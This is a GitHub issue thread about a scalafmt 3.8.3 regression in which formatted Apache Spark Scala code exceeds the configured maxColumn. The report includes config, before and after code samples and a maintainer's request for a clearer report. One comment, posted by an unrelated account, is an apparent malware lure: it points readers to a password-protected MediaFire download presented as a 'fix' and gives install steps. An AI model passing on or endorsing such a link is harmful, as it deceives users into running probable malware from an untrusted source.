### ISSUE TITLE
Version `3.8.3` formatting Scala code error (The maxColumn exceeds the limit)

### ISSUE THREAD

**Issue by panbingkun** [scalameta/scalafmt#4187]
## Configuration (required) ##

```
align = none
align.openParenDefnSite = false
align.openParenCallSite = false
align.tokens = []
importSelectors = "singleLine"
optIn = {
  configStyleArguments = false
}
danglingParentheses.preset = false
docstrings.style = Asterisk
maxColumn = 98
runner.dialect = scala213
version = 3.8.3
```

## Command-line parameters (required) ##

When I run scalafmt via CLI like this: `scalafmt -c dev/.scalafmt.conf sql/connect/server/src/main/scala/org/apache/spark/sql/connect/service/SessionHolder.scala`

See the file here: https://github.com/apache/spark/blob/e1b5d65aeeccd2d724b753fc6f2132086825bef9/sql/connect/server/src/main/scala/org/apache/spark/sql/connect/service/SessionHolder.scala

## Steps

Given code like this:
```scala
logWarning(
        log"Session plan cache is disabled due to non-positive cache size." +
          log" Current value of " +
          log"'${MDC(LogKeys.CONFIG, Connect.CONNECT_SESSION_PLAN_CACHE_SIZE.key)}' is ${MDC(
              LogKeys.CACHE_SIZE,
              SparkEnv.get.conf.get(Connect.CONNECT_SESSION_PLAN_CACHE_SIZE))}")
```

## Problem

Scalafmt formats code like this:
```scala
logWarning(log"Session plan cache is disabled due to non-positive cache size." +
        log" Current value of " +
        log"'${MDC(LogKeys.CONFIG, Connect.CONNECT_SESSION_PLAN_CACHE_SIZE.key)}' is ${MDC(LogKeys.CACHE_SIZE, SparkEnv.get.conf.get(Connect.CONNECT_SESSION_PLAN_CACHE_SIZE))}")
```
## Expectation

I would like the formatted output to look like this:
```scala
logWarning(
        log"Session plan cache is disabled due to non-positive cache size." +
          log" Current value of " +
          log"'${MDC(LogKeys.CONFIG, Connect.CONNECT_SESSION_PLAN_CACHE_SIZE.key)}' is ${MDC(
              LogKeys.CACHE_SIZE,
              SparkEnv.get.conf.get(Connect.CONNECT_SESSION_PLAN_CACHE_SIZE))}")
```

## Notes
the version `3.8.2` is normal, but the version `3.8.3` is abnormal.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by panbingkun** [comment]
When I was preparing to upgrade `scalafmt` from `3.8.2` to `3.8.3` in `Spark` repo, I found the above problem. The command is as follows:
```
./build/mvn scalafmt:format -Dscalafmt.skip=false -Dscalafmt.validateOnly=false -Dscalafmt.changedOnly=false -pl sql/connect/common -pl sql/connect/server -pl connector/connect/client/jvm
```

**Comment by panbingkun** [comment]
cc @kitbellew

**Comment by kitbellew** [comment]
could you please edit your submission to make it more readable? not sure why you decided to retain all of the issue submission template, including text intended to describe what we're asking of you, and not the other way around.

**Comment by kitbellew** [comment]
> When I was preparing to upgrade `scalafmt` from `3.8.2` to `3.8.3` in `Spark` repo, I found the above problem. The command is as follows:
> 
> ```
> ./build/mvn scalafmt:format -Dscalafmt.skip=false -Dscalafmt.validateOnly=false -Dscalafmt.changedOnly=false -pl sql/connect/common -pl sql/connect/server -pl connector/connect/client/jvm
> ```

the original template, the one you kept in its entirety but didn't really follow, explains that you can't submit issues here unless you run the cli tool from this repository. if you use a maven plugin, feel free to report it to that plugin's maintainers instead.

**Comment by panbingkun** [comment]
Let me update it.

**Comment by panbingkun** [comment]
```
(base) ➜  spark-trunk git:(master) ✗ scalafmt -c dev/.scalafmt.conf sql/connect/server/src/main/scala/org/apache/spark/sql/connect/service/SessionHolder.scala
(base) ➜  spark-trunk git:(master) ✗ git diff
```
<img width="1384" alt="image" src="https://github.com/user-attachments/assets/f284604a-1cb9-4000-9a79-97297a42ba46">

**Comment by panbingkun** [comment]
Sorry, this is my first time submitting an issue to this repo, but it is indeed a issue. 
I have updated the description of this PR and it is normal in version `3.8.2`. 
However, in the latest version `3.8.3`, there is the aforementioned issue.
